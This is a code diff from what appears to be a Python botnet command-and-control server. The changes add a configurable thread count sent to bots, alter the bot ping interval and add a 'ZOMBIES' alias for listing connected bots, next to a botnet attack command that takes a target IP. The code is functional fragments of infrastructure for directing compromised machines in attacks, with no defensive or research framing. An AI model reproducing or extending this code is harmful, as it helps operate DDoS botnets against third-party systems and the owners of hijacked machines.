File tree 1 file changed +6
-4
lines changed
1 file changed +6
-4
lines changed Original file line number Diff line number Diff line change 12
12
maxAttacks = 30
13
13
rootUser = 'root'
14
14
15
+ # Não aumente de mais as threads (Você vai foder com seus bots)
16
+ threads = 30
17
+
15
18
ansi_clear = '\033 [2J\033 [H'
16
19
17
20
def color (data_input_output ):
@@ -203,7 +206,7 @@ def broadcast(data):
203
206
dead_bots = []
204
207
for bot in bots .keys ():
205
208
try :
206
- send (bot , f'{ data } 32 ' , False , False )
209
+ send (bot , f'{ data } { threads } ' , False , False )
207
210
except :
208
211
dead_bots .append (bot )
209
212
for bot in dead_bots :
@@ -225,7 +228,7 @@ def ping():
225
228
for bot in dead_bots :
226
229
bots .pop (bot )
227
230
bot .close ()
228
- time .sleep (5 )
231
+ time .sleep (4 )
229
232
230
233
def update_title (client , name ):
231
234
titles = [
@@ -278,7 +281,7 @@ def command_line(client, username):
278
281
send (client , '\x1b [3;31;40m' + f"{ C } { m } { gray } { desc } " )
279
282
send (client , '' )
280
283
281
- elif command == 'BOTS' :
284
+ elif command == 'BOTS' or command == 'ZOMBIES' :
282
285
send (client , f'{ C } Connected bots: { G } { len (bots )} \n ' )
283
286
284
287
elif command == '!R' or command == '!REG' or command == '!REGISTER' :
@@ -313,7 +316,6 @@ def command_line(client, username):
313
316
time .sleep (1 )
314
317
break
315
318
316
- # send Botnet attack
317
319
elif isBotnetMethod (command ):
318
320
if len (args ) == 4 :
319
321
ip = args [1 ]
You can’t perform that action at this time.
0 commit comments